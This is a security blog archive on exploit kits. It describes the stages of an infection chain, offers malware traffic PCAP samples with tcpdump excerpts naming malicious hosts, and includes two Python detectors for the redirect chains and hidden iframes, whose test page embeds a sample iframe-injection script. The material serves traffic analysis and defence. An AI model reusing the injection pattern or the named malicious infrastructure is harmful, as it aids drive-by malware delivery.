Category Archives: Exploit Kits

Exploit kits are a type of malicious toolkit used to exploit security holes in software applications (Adobe Reader, Java, Internet Explorer, etc.) for the purpose of spreading malware. These kits come with pre-written exploit code and target users running insecure or outdated software on their computers. The exact sequence varies from kit to kit, but an infection usually proceeds like this:

A victim visits a website whose server has been compromised by cybercriminals.
The victim is redirected through various intermediary servers.
The victim lands at a rogue server hosting the exploit kit.
The exploit kit fingerprints the victim's browser and plugins and selects the exploit to deliver.
The exploit is delivered.
If the exploit succeeds, a malicious payload (a custom malware program) is downloaded to the victim's computer and executed.
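As an added example (not code from the original page), here is a Python script that rebuilds the chain above from the kind of tcpdump -A text the samples on this page show. It parses request lines and headers out of the dump, links each request to the one that caused it through the Referer header (falling back to the most recent request to the same host, because plugin fetches such as a Java applet download send no Referer), and lists the hops from the compromised site to the payload. The capture it runs on is constructed with example hostnames and RFC 5737 addresses; the stage labels are an extension-based heuristic, not the kit's own naming.

```python
"""Rebuild an exploit-kit infection chain from HTTP requests in tcpdump -A style text.
Added example, not code from the original page; SAMPLE_DUMP is constructed (example
hostnames, RFC 5737 addresses) in the layout of the tcpdump excerpts on this page."""
import re
from urllib.parse import urlsplit

# Constructed: compromised site -> redirect script -> landing page -> exploit -> payload.
SAMPLE_DUMP = """\
2015-01-02 20:50:37.000000 IP 192.0.2.10.1042 > 198.51.100.5.80: Flags [P.], seq 1:220, ack 1, win 64240, length 219
E..GET /news/index.html HTTP/1.1
Host: compromised.example
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

2015-01-02 20:50:37.250000 IP 192.0.2.10.1043 > 198.51.100.6.80: Flags [P.], seq 1:260, ack 1, win 64240, length 259
E..GET /r/go.js HTTP/1.1
Host: redirector.example
Referer: http://compromised.example/news/index.html

2015-01-02 20:50:37.600000 IP 192.0.2.10.1044 > 198.51.100.7.80: Flags [P.], seq 1:270, ack 1, win 64240, length 269
E..GET /landing/index.php HTTP/1.1
Host: landing.example
Referer: http://compromised.example/news/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

2015-01-02 20:50:38.100000 IP 192.0.2.10.1045 > 198.51.100.7.80: Flags [P.], seq 1:200, ack 1, win 64240, length 199
E..GET /landing/exp.jar HTTP/1.1
Host: landing.example
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_17

2015-01-02 20:50:39.400000 IP 192.0.2.10.1046 > 198.51.100.7.80: Flags [P.], seq 1:180, ack 1, win 64240, length 179
E..GET /landing/load.exe?id=7 HTTP/1.1
Host: landing.example
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_17
"""

PACKET_RE = re.compile(r"^(?P<ts>\S+ \S+) IP \S+ > (?P<dst>\d+\.\d+\.\d+\.\d+)\.\d+: ")
REQUEST_RE = re.compile(r"(?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]")
HEADER_RE = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*): (?P<value>.*)$")
# Heuristic stage labels from the URL extension; the responses, not the names, settle the real roles.
STAGE_BY_EXT = {"js": "redirect script", "jar": "exploit (Java)", "swf": "exploit (Flash)",
                "pdf": "exploit (Reader)", "exe": "payload", "dll": "payload"}


def parse_requests(dump):
    """HTTP requests in capture order; each a dict with url, host, referer, user_agent."""
    requests, cur = [], None
    for line in dump.splitlines():
        m = PACKET_RE.match(line)
        if m:                                    # packet header line: start a new candidate
            cur = {"ts": m["ts"], "server": m["dst"], "method": None, "headers": {}}
        elif cur is None or not line.strip():    # outside a packet / blank line ends headers
            cur = None
        elif cur["method"] is None:              # request line sits after the raw IP/TCP bytes
            m = REQUEST_RE.search(line)
            if m:
                cur.update(method=m["method"], path=m["path"], seq=len(requests))
                requests.append(cur)
        elif (m := HEADER_RE.match(line)):
            cur["headers"][m["name"].lower()] = m["value"].strip()
    for r in requests:
        r["host"] = r["headers"].get("host", r["server"])
        r["url"] = "http://%s%s" % (r["host"], r["path"])
        r["referer"] = r["headers"].get("referer")
        r["user_agent"] = r["headers"].get("user-agent", "")
    return requests


def find_parent(req, earlier):
    """The earlier request that caused `req`: exact Referer match when one is sent."""
    if req["referer"]:
        return next((c for c in reversed(earlier) if c["url"] == req["referer"]), None)
    # Plugins (Java, Flash, Reader) fetch exploits and payloads without a Referer;
    # fallback heuristic: the most recent earlier request to the same host.
    return next((c for c in reversed(earlier) if c["host"] == req["host"]), None)


def chain_to(req, requests):
    """Walk parents back from `req`; return the chain in entry-to-target order."""
    path = [req]
    while (parent := find_parent(path[-1], requests[:path[-1]["seq"]])) is not None:
        path.append(parent)
    return path[::-1]


def classify(req, is_root=False):
    if is_root:
        return "entry (compromised site)"
    ext = urlsplit(req["url"]).path.rpartition(".")[2].lower()
    return STAGE_BY_EXT.get(ext, "landing/intermediary page")


def summarize(dump):
    """One line per hop on the path to the payload (or to the last request if none)."""
    reqs = parse_requests(dump)
    target = next((r for r in reversed(reqs) if classify(r) == "payload"), reqs[-1])
    lines = []
    for i, r in enumerate(chain_to(target, reqs)):
        ua = r["user_agent"]
        # A plugin User-Agent on a hop (e.g. Java/1.x) shows which component fetched it.
        note = "   <- non-browser User-Agent: " + ua if "Java/" in ua or not ua.startswith("Mozilla/") else ""
        lines.append("%d. %-26s %s%s" % (i + 1, classify(r, i == 0), r["url"], note))
    return lines
```

Running `summarize(SAMPLE_DUMP)` on the constructed capture yields four hops (entry page, landing page, Java exploit, payload); the redirect script is a sibling branch off the entry page rather than a hop on the payload's path, which is exactly how an injected iframe loads. Against a real dump, the thing to check first is hops whose Referer points at a URL that never appears in the capture: those are the 302 or meta-refresh redirects the chain walk cannot see and must be recovered from the responses.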

RARE Zuponcic Exploit Kit Traffic Sample Delivers Adware:SanctionedMedia PCAP Download

Download this rare PCAP: zuponcic. Adware:MSIL/SanctionedMedia is a detection name used by Microsoft Security Essentials, Windows Defender and other antivirus products for a Potentially Unwanted Program. A potentially unwanted application is a program that contains adware, installs toolbars or has other unclear objectives. Adware:MSIL/SanctionedMedia is technically not a virus, but it does…


Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

Here you can see the web page that the attackers compromised (arksylhet.com/A67iD4eo/index.html); into that page they inserted an iframe which pulls in a JavaScript redirect file:

2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT…
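An added example, not part of the original analysis: a Python scan for the kind of injected iframe the Flashpack sample shows. It flags iframes and scripts whose src points off the page's own host, iframes hidden by size or style, and inline scripts that assemble an iframe with document.write/unescape. The page it runs on is constructed with example hosts. It is a static check only, so it cannot see an iframe produced by more heavily obfuscated JavaScript; for that, the script has to be run in a sandbox.

```python
"""Flag iframes and scripts that look injected into a captured HTML page.
Added example, not code from the original page; SAMPLE_HTML is constructed (example hosts)
to mirror the pattern in the Flashpack sample: a legitimate page carrying a hidden
iframe that points at an off-site redirector."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed page served by "compromised.example": one hidden off-site iframe, one
# document.write/unescape dropper, one visible off-site embed, one same-site script.
SAMPLE_HTML = """<html><head><title>Gallery</title>
<script src="/js/site.js"></script>
</head><body><h1>Welcome</h1>
<iframe src="http://redirector.example/r/index.html" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://tds.example/in.cgi%22 width=0 height=0%3E%3C/iframe%3E'));</script>
<iframe src="http://video.example/embed/42" width="560" height="315"></iframe>
</body></html>"""


def _px(value, default):
    """Parse width/height attributes like "1" or "1px"; unparsable values count as visible."""
    m = re.match(r"\s*(-?\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else default


def is_hidden(attrs):
    """The 0x0, display:none and off-screen iframes that exploit-kit injections typically use."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style or re.search(r"(left|top):-\d", style):
        return True
    return _px(attrs.get("width"), 100) <= 1 or _px(attrs.get("height"), 100) <= 1


class InjectedFrameFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.findings, self._script = page_host, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and not a.get("src"):
            self._script = []                    # buffer inline script text until </script>
        elif tag in ("iframe", "script") and a.get("src"):
            host = urlsplit(a["src"]).hostname   # None for relative (same-site) URLs
            offsite = host is not None and host != self.page_host
            hidden = tag == "iframe" and is_hidden(a)
            if offsite or hidden:
                self.findings.append({"tag": tag, "src": a["src"], "offsite": offsite, "hidden": hidden})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script).lower()
            # Static scan only: an inline writer that builds an <iframe> at runtime is a
            # common injection; anything more obfuscated needs a JavaScript sandbox.
            if "iframe" in body and ("document.write" in body or "unescape(" in body):
                self.findings.append({"tag": "script-inline", "src": None, "offsite": None,
                                      "hidden": None, "snippet": body[:60]})
            self._script = None


def find_injected_frames(html, page_host):
    """Return the suspicious iframe/script findings for a page served by page_host."""
    finder = InjectedFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings
```

On the constructed page `find_injected_frames(SAMPLE_HTML, "compromised.example")` returns three findings; the one that is both off-site and hidden is the injection, the visible off-site embed is the kind of benign hit a reviewer still has to look at, and the same-site `/js/site.js` produces nothing. When triaging a real capture, pair each hit with the request for its src in the PCAP: an injected iframe whose target was fetched immediately after the page, as in the packet above, is the start of the redirect chain.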


PCAP Converted Traffic Sample Gondad Exploit Kit

2014-12-13 16:53:26.092318 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 1, win 64240, length 0
E..().@…D…..n-.]. .P..u.@. .P…u,……..
2014-12-13 16:53:26.093193 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1:549, ack 1, win 64240, length 548
E..L).@…A…..n-.]. .P..u.@. .P….j..GET / HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.bing[.]com/search?q=gilsangart[.]com&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0…


Gondad Exploit Kit (EK) Using QQ.com Malware Infection PCAP Traffic Sample

2014-12-13 21:12:18.365748 IP 192.168.56.101.1389 > 8.8.8.8.53: 37206+ A? r.qzone.qq.com. (32)
E..<……(…8e…..m.5.(*..V………..r.qzone.qq.com…..
2014-12-13 21:12:18.426615 IP 8.8.8.8.53 > 192.168.56.101.1389: 37206 4/0/0 CNAME qq.com.edgesuite.net., CNAME a1574.b.akamai.net., A 23.61.194.48, A 23.61.194.216 (127)
E…….9..|……8e.5.m..^..V………..r.qzone.qq.com…………..W…qq.com edgesuite.net..,……J….a1574.b.akamai.=.N………..=.0.N………..=..
2014-12-13 21:12:18.431687 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [S], seq 759589942, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…….8e.=.0…P-Fl6….p……………
2014-12-13 21:12:18.435525 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags…


KaiXin Failed Exploit Kit Attack PCAP Traffic Sample

2015-01-02 20:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458
E…..@………w……P…>8…P…U…POST /tj.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.568bar[.]com/tj.asp
Accept-Language: zh-cn
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.568bar[.]com
Cache-Control: no-cache

yz=1314&uz=1&jc=
2015-01-02 20:50:38.059030 IP 119.147.137.128.80 >…
